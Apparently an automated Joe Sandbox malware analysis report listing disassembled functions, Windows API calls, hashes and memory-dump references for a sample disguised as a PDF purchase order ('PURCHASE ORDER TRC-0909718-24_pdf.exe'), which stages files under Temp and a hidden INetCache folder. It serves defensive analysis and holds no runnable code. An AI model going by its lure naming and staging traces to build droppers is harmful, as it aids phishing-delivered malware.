Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsiEA09.tmp
API String ID: 1356686001-2212294431
Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

Function 00405683 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
GetLastError.KERNEL32 ref: 004056DA
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
GetLastError.KERNEL32 ref: 004056F9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3081826266
Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8

Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000000.00000002.2020005310.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2019990214.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020057688.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2020073545.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

Function 00405C59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405C77
GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92

Strings

nsa, xrefs: 00405C66
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C5E

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

Function 004063BF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
wsprintfW.USER32 ref: 00406411
LoadLibraryW.KERNELBASE(?), ref: 00406421

Strings

%s%S.dll, xrefs: 0040640B

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll
API String ID: 2200240437-2744773210
Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8

Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"), ref: 00405AC2
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612

Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi,?,00000000,000000F0), ref: 00401645

Strings

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi, xrefs: 00401638

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Fasciculi
API String ID: 1892508949-4067767340
Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D

Function 00405128 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405157
CallWindowProcW.USER32(?,?,?,?), ref: 004051A8

Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177

Strings

, xrefs: 00405138

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69

Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE

Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,74DF23A0), ref: 0040520F
Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D

Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000477,00000000,00000022,00000000,?,?), ref: 00402CF1

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69

Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000477,00000000,00000022,00000000,?,?), ref: 00402CF1

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsiEA09.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C

Function 0040642B Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
GetProcAddress.KERNEL32(00000000,?), ref: 00406458

Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E

Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
EnableWindow.USER32(00000000,00000000), ref: 00401DFD

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
Opcode Fuzzy Hash: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D

Function 00405C2A Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003323805.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003853166.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PURCHASE ORDER TRC-0909718-24_pdf.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15

Function 00405700 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
GetLastError.KERNEL32 ref: 00405714

Memory Dump Source

Source File: 00000000.00000002.2003264150.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2003215876.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2003296579.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
